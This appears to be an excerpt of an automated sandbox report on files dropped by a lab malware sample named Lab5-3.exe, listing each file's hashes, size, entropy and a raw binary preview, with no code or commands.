                                                                                                          SSDEEP:48:MEtVfZvVs7/EO9bFWAKe3gBA+9c615JZEWVHfUTid3hBaUoSGFcmeykEdEElU92i:MEPZvVIbFWWgQS5UWuGx0uKeY2ElUJ
                                                                                                          MD5:F06368EF6B799849BD79BDEEEBA15295
                                                                                                          SHA1:BF6CEED444F9F91A7572719366F6DE069C985E29
                                                                                                          SHA-256:C0131A1C27A5DB5E0BB57A11880284A850AEB14C80C19D3A26A659C9DE8D787B
                                                                                                          SHA-512:97158AC39838DB6AC2981A28006C6489B8110D94FCE65874954711F595B054DC485810ED95E54F842D30DCA8F0A56A7E570F4246D8D804C86D6F6CF44C04544E
                                                                                                          Malicious:false
                                                                                                          Preview:*...'...RE....=.d'........'......Mq;..}...=.R..)..2 6.......Xx..k.f.........b..c-n.y..XP..........7.+..R......qNq......IF..NPN..k.zC.m...].)%...1...t...xp.11....I....W.Y.@.y.n1Q..........c.....e1..V....*_z...}"Yqr...8....e.x4...?_.V.].}.\.u.......+..&..L......Gk...]..N.....I9..e...X..&...vo.I..Ps..04.....<......3 .,..W\.W.....T....l;.H;hM.~.(z..U">m. 5.iTR..F...I.......-&cr..N.....#...&g8..T...X..........8...n...Vj..lL.)....;.*l.'..l..t..q.F..o<mxA?.2&}U-&c....o....8HZ....K...#Um}i..~......S..........\r....jU..rk#....9.y...]rX.`....G......G..4\F.......C.r..0.fG.a.&..f......U)y...M..M.g.7...k.8.2..(.u...e...^..#..5..).?n.h.4..P.ZH..~...p.24}....tV]p..HN;.m.6x*...J_.Z...+..s...?)S.+..N.*l^..~H(7^q.....S....(4.9......'...C"e.T......'`..g,3..lx.Lm...\..K..*..GWa. i..C.'..;..Y..,..Z..y|.TQa..c...b.m:.....a....%.a..<..>"!,W|.8....i....l0.v.......u....UT...Z.W...4`Y.Q.S.......t}._...o.)._.E...~..L.K.C_...E..&=....@.z...fE.M.0...nO..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2368
                                                                                                          Entropy (8bit):7.920051313273412
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:lrAQxot+WhZfigO1jAQXGHfUTid3hBaUoSGFcmeykEdEElU92i:aQxohhZfEpAQXZGx0uKeY2ElUJ
                                                                                                          MD5:95730A1774B1FA75FBFE75E9B4B3AECF
                                                                                                          SHA1:DBC9FFB414416CAFE322B79F37F2D263C435E368
                                                                                                          SHA-256:96A8308FAAD80136D2BFA6EE21A48617CD73C675F064222515E95CCD9E7C8BD7
                                                                                                          SHA-512:5A0C1D4B95157341B1FE7921F1EF9D1C850F16D01C80D7439A13E0F219C98E6ACFD21FE54050D7A9A5EE765392CCECE622BD0688FDB5625D440EAC2D8CF28A13
                                                                                                          Malicious:false
                                                                                                          Preview:f...P.4... %...d.Fm...6R*.....W...m}..j.Q..._"#{.j..@i-G..P..F.np.....7...2../..s.....wIZp6.....y..B..r..A...E:....+~_Z...u(.s..e...n.....>.mM..%.I.l..<[..../$4..ATUW..&...+.9..c..R.%......+|.....=4+.5V1.$}.KN...Gq!r2...v..M.....T\m.........x..(P.....Q..'Y.q......3.V.X..<.6._E%gZ0...j.~..x..KP....}..[.{.t.d.x...P...x7..5...1~.........z..|.1...1+.S...Z.Y.S...q.~.q..X..6.>..v..........H[...6X..?.c..M....:.ExkE..].2.O..y.b.......}uf.D-.9...6{..=..I..Y...n.E&.i.,.R.UX.68.9$.....&...jH..M...e.4.8s..F.......p..`....-.....m?..?..Cf..%. .".tunpYT[....y.....s]k..Q.....(.C.=.ps..h...-.....vD.nN.H..*c....b.....ns-D.cI.LK.......)..JYk...1L.y.....H#.e..w.t.~`...i....W..d.z......H.....-.`.ME!.TN]..Q..3.*.. .Cn_.....@.o).O..fu....A....Qor..C..:...M5M..>...\..3....j............?..H...E.....f....u<.1bPOu.......sq,kLx.....n.KU..xw.<...s1.@Z>!1CL."....Q2.t5..l.q....P..5.T..\.z~.......A._.gw8....N..ksw.a.!]!H.q..[P......X..FsY......./).n.........*2.+....6]
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1776
                                                                                                          Entropy (8bit):7.881062734476127
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:vl577baz3DHfUTid3hBaUoSGFcmeykEdEElU92i:vnPagGx0uKeY2ElUJ
                                                                                                          MD5:9684337D47B5B1E470A3D7660AD9B3C2
                                                                                                          SHA1:52C93B821AF14895FB060EDC40F93F5265F216AD
                                                                                                          SHA-256:54E2FD8D5CFD6FE16651EE1035C83133BC8E4E0FF22356335F9EB6FE578344D6
                                                                                                          SHA-512:0115DEEA19643FB19FC07852E59DCBDE0D65AA18000976E346B3ADE90F26B545905948FC2DFC943B15D9B0E22BAF5BF24C550994FD1BAF408AD628275EF5003A
                                                                                                          Malicious:false
                                                                                                          Preview:..0F.?..&.:..`...........#{-|...j.{.t.B}..m..V.t.kU8..3%.~../E>.$p......(...jnJR.AQ5.x...n$.K.>...o .S.G.QK.7.....v.5.....*.....1....N.$Hx...Q.......'Xo.0.._..(....07b.......6`|&-Y...Z}..1. .n..c....|.+.ej-..kY.8...'..R.. P.mRR2Jt#.EN.\.,.%..h.imA..x\R..\u.........-.....Z.o8....pS.|...lH.Q.B.!......#..._.+..2.TWmc|....\.N.n..fOHSX!. Pv..^...S.f..v...L:$...6@...e.....0..PKD.o.....s6.A....RP....b^.;+.zP...g.ld......I&Q..@..4g....{mT...k...i..i..a,n..K.m.a...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.n
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2128
                                                                                                          Entropy (8bit):7.908972938517742
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:fTI6GgXywvwwvOVHfUTid3hBaUoSGFcmeykEdEElU92i:7I6nywYwvlGx0uKeY2ElUJ
                                                                                                          MD5:A0372755D4C0893B923FCFDB2624CFE6
                                                                                                          SHA1:E84BF8B41A11C7952224CFE4435A605529E1AF99
                                                                                                          SHA-256:E7809C20872DB907EF0CD64444697C86352FD7B33DB4025308AD539F711F1BEE
                                                                                                          SHA-512:CDD5ABD280CD604B86D9492A8340B97891D173FF6852712B148CAF24015A95245C6A0CA36C4FEA9741C781910DC15AEA47ADD9209FB69DBE15A35A923D8AFF50
                                                                                                          Malicious:false
                                                                                                          Preview:.".&...M..L<.A.."...z0S......:DM.&).*.c.....+.M:.k}.......JVj.S3a...f..5...*..v.2A:.LQ|y.G..H...z.1d`.{\..F......3.....G...P..`...@r.T...(.F.d[k....5.l.....\`..)..H..x.F..9....%................=Oz...~.i.4...h.....|......;...0q....<=@.vp.[:ar.w..B...Y..q[ #^.apqD.R!..0X..8.O,..I.\...V..n.4......U...^.E.[)./.........&%.n?..a.3..W....5..gV.....)....*.\..tx.T..'N.....m~4......;.T."....X...C.oN^c.X..)..-RH..eZ.L....XR..y.9.m..r..z..U.U.Xp.D.QWQ.&...........z..X.6k<.r6........p.,Iz..B_O1...].>^U.{>tfE.^*......t...Z.....o...}.c=H.....[....=_c.T|.._(6.J.).....p...W4......I.-(...Ll;...}...F..xJ...*1`.~J.....9..r..*.e..PX%.....0U@t..$c.l...1n0...%...r.=.f$}^.....v.mv_.]3...w...D.I.7.....C.`{.Z:.k..I......h....9d-.NA.......M:.1l.........YG]|............>.-2u.3.)..Z>$...VQ<.0.1...U..}L..Q...\...^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2816
                                                                                                          Entropy (8bit):7.935331510595558
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:OVSx6JyVEz9VxmQWqhRzgQyksC8uabPrb+hHfUTid3hBaUoSGFcmeykEdEElU92i:Ogx6Jw4vxmQWqhRsfkz8umjZGx0uKeYO
                                                                                                          MD5:A9557C88814D5F57A3BE7AB2696CEF26
                                                                                                          SHA1:BA9B453ACDB6073CA83A8939288E56A00B5C97FE
                                                                                                          SHA-256:38938589414A0F74DA98FD23F07A59D3F078D2FE37D21BB5BD4DB89F7642F8B1
                                                                                                          SHA-512:3E726091498EEA59BC753364B4F80969ADB50EC1EB2AF5AE0EF93C4430A6480E3E55614CADBD52CB11B2BC1BE578DF6E5ACF797A3C0C9234301739E9B0FD823C
                                                                                                          Malicious:false
                                                                                                          Preview:.O_.4.6#.|1w.W....e..f<.V*.M...`;yku.......1.`.q_.O.^.7Q.....V..".O..).u}yT.B..T..n.....c.<......... =.=;...YB./...........d)......2...........uA..2..[i..:..q~.H../.L$L..R.:#`..x.+.)1l*@{gUeD..G...^.........p..(R.X4..=..]`........X..G+(..`.D........9.....2...Zv..X.d.U.o..5...qU[h.YJ.....H..V..Y.oN..Z.....7<=.r..ZSB.y.!..72...I......~.^..z.....^}...3$.%....k .8.....[..$.y........{..v.f..%=.......u..b....l.'..|....=v.$.slA...k.W...K.Z...oT...].\......,.Y..5..".%...?.y3J....JT.Q..N...S...~.\.........)..h..R.J.T........kqi...D..U.a.i.cr...l.'.7._..O....Sy^. I)D.Uq..(..5..1z....5.1gN..i(....!O.#....._.I.0...Sn.D"?.t'.b!.g.....Jv1s*.........T......8.d.ubI.....;.~.g.e@..=.$*7.......6p...!jB.n..,...^.8..o.y..f.,.......Q..YP...p..K.4..E?q..3&.=Dg..B.B...Z..X.`.n........#..!..6qH...Dr....As..w....%..+.=.zy..........G..~..(..p.!...LD....+9.N...L.3.)q......./(......1..).../..........3..c.....(..|g..M..{..|...Z.}?.q..N..h..?...whn..~.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1792
                                                                                                          Entropy (8bit):7.9047725640207185
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:qxrwgoBOKVVtHfUTid3hBaUoSGFcmeykEdEElU92i:qxwNBOKXGGx0uKeY2ElUJ
                                                                                                          MD5:D95443BE7840E863860EE358756A3D6F
                                                                                                          SHA1:8948FE88F43CDDE0CDE4EC7BEEABE7E87257036F
                                                                                                          SHA-256:DC084B8D14082E61AF72023B9AF0B4B36DAC05DF969415F6C2112FBBF15F8146
                                                                                                          SHA-512:9A7118E8CC7B8FA1D204A6766C19C4B98ECF706D5A5223A6B56F93FF9A5CC204FA1D21432FC3C4FFEDE643D28BCD720D6C29FEF101E5B76BFFD14E464659343B
                                                                                                          Malicious:false
                                                                                                          Preview:...Yk1e-b.]........;.........2Y...o.y...Q.....RC........$....CU..N"..U..%y...] Q..#.-.dO7.........dg)vu....:6..e.......7h.5..........2gIL...s:...S..&..j.(F.r......|..u.......3.w.`._@..l.j}...~....o.5..Z.!Ao._i...\.....Jc..H...+..f.....*V..0.c|..C.t.....}.WRx"S......>.M.Rde...q..P..9MC..L...@.0.T./x..x..KR...}.. ..T'w.)..G..8.7...X,_;..H..>.y...6..v...H.l}.T......ih.)...!..CM..\V.E...)..BN:yh.vF..Q.>.....=..y..'.k...2........s7.....#y&K.s.....`..#..b<E...Sg.Bs..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2480
                                                                                                          Entropy (8bit):7.929274643270983
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:u9So6IOwGdAw/0H2cT2Dob/CHfUTid3hBaUoSGFcmeykEdEElU92i:u9So5Ow/as2cTFblGx0uKeY2ElUJ
                                                                                                          MD5:379446ED4018ED11B972B889AF93A454
                                                                                                          SHA1:141EBD2187BEE85B2B7AEB1E9335155739D264BD
                                                                                                          SHA-256:F1278E6439C9A4829EEAC6B83BC0F45A9B4C7E3E643D20BF2D17857CBC44EA87
                                                                                                          SHA-512:83EE5B6171F53A5CE0640AE4A6D3AF4B017BC18D3171F1356D81A6CC8C26870791E057D0A01E0A6E46FABF99FB71F75ACDAD9C020F20E33D1665D6F7416263EF
                                                                                                          Malicious:false
                                                                                                          Preview:U..h.[...B.O{2jt9>.8.6..;.{7.~RPg\.=L.8.O.....>..+..Ra...O^....A}5........va.T...}...~.R/N.Q....@.........r!......K..{?..5...Q.;|...'....xY..pm|E#.gK....P9I`...Q.*...................c./.G.kq....G7B.{jk.a.....g.,|..@<.. ...b..q8_....8...I....$u...dZb.P.[m.......K&f.......zb.7S...^.......,.%...q4..MF...'....=...O.n.x...C6R.j....`.....q.....L...........@..f.=..b....=..E...#.a.Q z..N^/..}....ji..Tb}...wd(.Q#....J;.sK...:...A..2..;-?n=N.l.c.O6E7%....(/.$....._..<....A0.>..X.7.......)^..q..X..|....zL...y.......K..........o...9..Al-.X..l...e.(...9.kQR..Z..K.E-}..=...n..g.s.F!. .......p:,.......R.%..`...T..4..dv.R.@...&..q..&..4.K.i.0H%.U.G.}...F......s..}B....Q..O........i./..i..D.U=.......?..IQ.);....H9l^\.{...$.#.Q~......w..o.K."g.=i../.{.c.k.........`OL....X>F...........Q9...T5...B."...M.4.m.+..t...F.#.l[9...q..F8.y.....u8.M.=.1....f.F.p.-.`.~.......s.iF....P..x....4..Yn..@..&.,0wFD?........1..=...O......N..S...wHX[t..=>;..p....W*.DW#.w....jH
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2464
                                                                                                          Entropy (8bit):7.931533650638258
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8gKIaoqB+GDfnXzVyf0fo37cmPHfUTid3hBaUoSGFcmeykEdEElU92i:8xoqsifXzVyfemUGx0uKeY2ElUJ
                                                                                                          MD5:51674A751F48F581A3D75FEA47689487
                                                                                                          SHA1:7DC1D6D8550D75149CF386951F32DC356201FC8B
                                                                                                          SHA-256:F41C686BDAF7A62C592155CA9C058DBE16C603078C8D7C47F962A753A4224A24
                                                                                                          SHA-512:D2FD4C22B20CF4C98A49413930A252ED2A55E3B748621171314DE97D5DE31D0F40B02CFDF017530FFBC942B8684A467FAF5B6BA4774426CEC579ED2A92444DE7
                                                                                                          Malicious:false
                                                                                                          Preview:...-...u...z.../....1.3I..f..%.....g.).\.V.&+W._.....q.U1.WEE.N};G.EO..q.8..q...m...q..Ln...A..U...u...;.......'...HT.G.]..7.N\.`....3j;."~.......N....az..h..o.Jy.K./.&..c..k...j.`.....>.0.....\.5<.Z..,.MYW.....V...D!lM......).MI...k.q.B.Y.yT....3T.fU.+....Y;..P.5 .&T....^..7.Q8q.......L>T..(G7....6...-2..._IZ8./....m.H..M..f.k..!k.B|..r..C...Z[J...R.U..4.5P..........h...*#MZ.C.{..6>.][h...A!. R.s.=(l..b.....9].4.y...,..C9..h.Vc.B..e..-8j&8...vx!.kL..W....b...$e.ya%..)....Qz.Z.v9c.!.1.5....2{.%..D....../.g.>k..TR..kk`....O..^H....w. nF..Z.q..t.1........*..w..Q...k..[.j.o..].Jml.......0.p.5.._(.t.t.$.\......SQ.....0a.JOe.kGx.Z..n*..$......w.u|.F....4...~I.yYs...aq_.....U=.|.... f.....+..D..68OEA.,......;>pos..v.x...<7.K.u.%?1.s......1.._1...d....s...................Gj...TN......(=.{eEL......:.O..l`v|...d..'...p.....S.X...*...b.......-.w8.y...|.I....-l.I.......c{..-.Y......t........G..8.H..Q..rB......e.9'...qG(?s.KN<....K....;^.^i..%.7.1)l..%.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1648
                                                                                                          Entropy (8bit):7.899262225991916
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:4DRrXuHfUTid3hBaUoSGFcmeykEdEElU92i:cbBGx0uKeY2ElUJ
                                                                                                          MD5:6A347BE1BC0ED14E7B3E8B994492B4B8
                                                                                                          SHA1:E70679607341007FA8A02FD49D382913F7D821E7
                                                                                                          SHA-256:563289DABF5F0511CAF3A2BCCCE41CAF6B4FEEA8520038C6EB7C20B3F85E7443
                                                                                                          SHA-512:1BF3C63F80BE891619612EE4CB8AEE8ED59F08221AAF8B3CAE72DEAC4BE494D28C5A29504B22D9271A981960DAE2DCCCF6F54DDB10581C0997AEF07116E9B9E6
                                                                                                          Malicious:false
                                                                                                          Preview:x>..z.,.hV...!....A....:......1..+.h...t...G.r....(q.=F....\..l....?.........D.<@.a./...=.....O.`.h.2.2.2....%R.W..4l!.o\L...u...Nz......L....X0....0(u..p....6.3...P..rU$.?Pw....9..S.........d....U.........=.^Y.m.u.+....a. .olY(.I.H.]....5...05....y..nu.a..C+#...['. R...l5o.i.U.lV..z..Vi.....?kN{....F3..........,.ia.2...`...F..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1648
                                                                                                          Entropy (8bit):7.8943471195485015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:BDzMZr1rHfUTid3hBaUoSGFcmeykEdEElU92i:B3eiGx0uKeY2ElUJ
                                                                                                          MD5:E1A1826C3A6198F266BDB0D563CB20CA
                                                                                                          SHA1:4AC478FAFBC5DD90565074C88721C46A2F3792C7
                                                                                                          SHA-256:E6C0E73BF4F84EF7ABA663A6118B1DE2F682EA09A4561F95956CC0CFAD9B8B5F
                                                                                                          SHA-512:74EA883E9517C541FF3DC525E93591E22305413CA9A09B287405CC8D4107DED77454CCE33B126883A4DC5949310F1AABF2912DB47FA5EAFD4DA7130983E968B4
                                                                                                          Malicious:false
                                                                                                          Preview:h.].j<U4.O.O...y.^...sr.1K..7.5....~E...zB.......W[.!.c......Ol.|j...O.....'q...#..yYa...N..D....x...u.V.>$i8...s............v]..Z.......!..)..&....8........~}h.6.bl..........&5....g..?.h........L..Y.i.=...C....6n..<W.}*7....J.m..<..#.....V%.......{.8X...%..&..^.....R...I.[T.8..p...zQ......V..k...1.........RZ...G."7(H.I../..^.Q...rp....;....M....R...=(..(ch.s:........Q.V6g..>L.D.j.V.....;.$....h<P.p.....z.,r..8^P../.Hx.F...04.Ov.0&>.5P...t.,......y.....5..y3./eT..1...g....LQ.D.%Jn{...&.}...m.Y]da..........u.....r.D........<.F...`iY.+k...P..k.-.*.....67.I.,g.._Uk.h..Z........app.......B|.9.....&..H~..T.6..?....[.~....O_2....,..H0B.Y;..6..6.z"...E.;...Q.,./..........5..O.^.]..f3!...}...{....QL...>;E...1.C...).c.......(...C..BB#.\.L..WH..:..A...;..8V).....\..9....7$l/......@...3.o..7~...{.1..jD!'......9.nz.6o.....=...?...p......X...#......?.o.Y.q..o-.A^.&...=.G.....3(...<...W....<..JQ...+...5-v{...i.b....jY.x....._.\...8G
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.934410529635089
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mN2BEFNwwXsqaBDSuFy3RddJJ/WUiZaU8ntWBHfUTid3hBaUoSGFcmeykEdEElUJ:6WE7qBWbhddJJ/W0U4t3Gx0uKeY2ElUJ
                                                                                                          MD5:07A9FF7E6E45B2CDF385BFADD67C384F
                                                                                                          SHA1:E8B539C051BCEAABBC52D537B2DCF9FB53A2DCDF
                                                                                                          SHA-256:E73A6CB03DD7306F93C246807D71F18F17C333E8884DCBC94B89060EC617ABB6
                                                                                                          SHA-512:B5C2F5D025956BC609DD2D3385ADDAD467EED9C0C478D696C69825F5DC16913D14BD5B138761F85E6F4BFB2D027C17A6FEEE84CFD7607BF8CB29EAF2F15A7FE0
                                                                                                          Malicious:false
                                                                                                          Preview:...D...d.W....%.h..a....F....T.......7.7....{I..Sh..u..v..b.....lcI..8s..=..t......C...7p.......oDe}...V....'D~.@..Dg...<@.-.D^<"+..8..>....b.....S)k..?.?C_1/x..F.6.P..=.I9guc...@LW.0.?....u..BzE.{..S....c.$.-..J7.....(.\j..|W...o<..?...D..s.k.A%...P......O..L.....[.Ys...+\.cU....V2W.....9...-F...f...h....6.'...X..M..b...'`.+..Cac.O[.B....@...].Gk..Z.........MS`.pw.z.t..oM.....&.f.;..Sc.9..'...Qrm...Y......vt..A..U...kM...pooU..'.Z..$.2...(D.Y.._..r~.\...C..h!.]X.b....L....>..G....`.L.R..<.>@.....<.i...M..._.V........];.A../.0..nK.....=:..#I..={.=..l..{...w.....tv.+...%A....P).6....[%..O*....B..O..V.E...$.".P..H.G..Q4..k'..`..Z..sZ.q..q..>..z.oR.9....!XM.uf....T.Y@.S.h..+..n@]..T:;,$..o.0..........#.Af.}.<....c.Q......./..kG.<..LIq.Qs.q.8.........g..*P..........)*..~..C..s4].s.N{......!.}eOL_b...B............@..........{O....R]_`..Q.........?!...Jd..z...w>.C8.V{.....f...s..c...#....vh...O.{.....:.~.E.@.-W...Wf.;s.'.? #"K...4..V......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.925415765974416
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:dPcHs5CtuzzYy/4EJh+gZ0rMl1HfUTid3hBaUoSGFcmeykEdEElU92i:FyxtaYyzt0rFGx0uKeY2ElUJ
                                                                                                          MD5:7D264FD7292E7D5597F1BA0D577F294A
                                                                                                          SHA1:BDB7D50EF70646DD53476F25BF4C087160D73693
                                                                                                          SHA-256:EAC1930A9CFD08E92D5AB0CC7AA019293A7AEBB24135629F69EAE86D5C1AC45F
                                                                                                          SHA-512:8FA8B00501A68E1F9F8A9FEEC077F06FD9F4A386CBBAD86416626F949EC1F11B6DE546DD5B65D616BBB099D7E3E991CC39450B2B470D994B4F559BC55EFFA3CA
                                                                                                          Malicious:false
                                                                                                          Preview:.....!.n...g. r6.*w.)F.3.5B7.N...Lc....V.......28$..".,...@.......G..)........m.V.qC9a.r......d....x..3..x.}.....bf.S..Q......-_lO.K..K^@K.........;.zy._.J.+.)q.,....-....'...7.E..Hx..#...}.n..[.].-..iw.o..c./M...p....F..#.*-.5KD...$...2M%.\..NY..5.AY.N.S......Lez..Z'.N7...!..^.B.1rYo....1...B;e.-..N.8\l5c...J...ep{....cnW..ewC.%U.NS....6...L.....@...._..._..v.s.Z.&4.Q....Q0.^..{.t..V...D2.k|.'X%..h.8.....C>..CD.......e._^.........6...!H....)...R.M..\......<c=D.......C~.F.=..\. 4...{q....Es....F.....U........y"......sI..i......N..Mxe.?s2....+..$..:..Z.+.......a.*m..].M..(U.....!.OWl4w.<...U...g.{...a\).}.#.Uc%F.m.9;Q....(...&{....Tt.d`.Ur.1....`~R..1........i.;...?........Xd...@y....{.H....fh...Z1+.%.\....~....M...U.&.....,DY8F*........?O..9XE...;.'@.....i.Y.....T..?...R+.B.......k.h.l0.....~.F^...E.......P.R.5..E.>..\t"".P....Li.U.....Q.b.W.."*...9v.Q../>.l..gI.'...p.r=,Fu....R..+..z.w..Z....K.K.q+....O..+Y{.;x.6 x..\./W. ...<z.m.R
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2560
                                                                                                          Entropy (8bit):7.931041485267449
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:mtzlVjErLtRNrycJl9C6ktl1e9QArHfUTid3hBaUoSGFcmeykEdEElU92i:yzlVYHtnyAE1ed4Gx0uKeY2ElUJ
                                                                                                          MD5:B65BEFEC75BB87B200AD08728D307728
                                                                                                          SHA1:CDCF1E356130DD75A3B3709F07BB6C151E5ECC62
                                                                                                          SHA-256:A2D4750D7DB3B5BE984B2B1A957E287DF3400E4261A1B737E0EDF2905ADD8A22
                                                                                                          SHA-512:2E7469729605D6727752DB9B00777BB0CAFB74B767949F73E695C9564C1E4F8CE5F80EF3086DFC77134958D6807FF9EF13ED66FDD0FB0228ADE1E61919D02B73
                                                                                                          Malicious:false
                                                                                                          Preview:Q.Uu....+..*]...=PF....{..."V..` a.6.hl.,.:.r..)..1By....B[7.}.#9...........T.._thZ.=d.....-'. ;.n...v_|....H......b|.....0<.~..9.C....Q..."W.w.....2.S..qW.z..<.\..l..A...T7(.x...*b.Em.!..0..)Y)l.MJ.....2.G..G.v.r.0.&-.......8...N`........1B.B.5.}..#..>.f..=..&.x.7..D..t...={t.Fd...-..j.0}....b..X.G.h...W-.A....z1lo._ih..rEnE....;/...N*....\.5.{.....avB^.]p....2........."...H).t....k9..6.]7F.YE.j....z. &.3.T.$.GAaFS2...^.u.NS.E..V..4w.( ..R.G....:..)1P.k...y..9..#.............o.],.5b...7...b=....q..>...&.-....C..a..*..l..7....o...ik$3w......:......"&6.F.ML.I..{c.A.U.-.....$Q.G.O$....6..../Z-U.].m.......;....H..*.\..Z..*...BG.-.E^.j73...h4%..{..N)-0.]m.....y..3....<y...HW...gu...!..........!K.6J.0.....x..:E......KG.s..t..Rh.uX.'@^....&..Og..g..vq.............V.../u_..-h!...../..\...N%.j3.....%...O....n/x3.>..g%~.....>..]..`.b.....w.~....d.d....%..e8l.V.5...#...z.=.rw.[....|.....@.......P..l..w.#j..._.." .l.9m.....f....k..K...e...C....|-...@...e..{.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2384
                                                                                                          Entropy (8bit):7.91834432757911
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Bo1uR7sHI/f3xSoPudoAvufHfUTid3hBaUoSGFcmeykEdEElU92i:CMZsSf3xSoPudoAnGx0uKeY2ElUJ
                                                                                                          MD5:EAA44A0C57E85B1616DF5DC538EAE571
                                                                                                          SHA1:E46A9ABB67AE9589AD61CF6F8E2E5028AD81E7A7
                                                                                                          SHA-256:8D803A9884CDC8A2F9C1BCF67034DAEAB64349894F6F5D8BA3F52C5D9172F012
                                                                                                          SHA-512:FF444C23881340D65DBDF34DE45766CD76898C7B49618F0315F2A44491FD26F36EF90AC44C4DC1739F0FC8C2B0E4D33DA97B6AA17DB459B11E05C9CDD0B9BD87
                                                                                                          Malicious:false
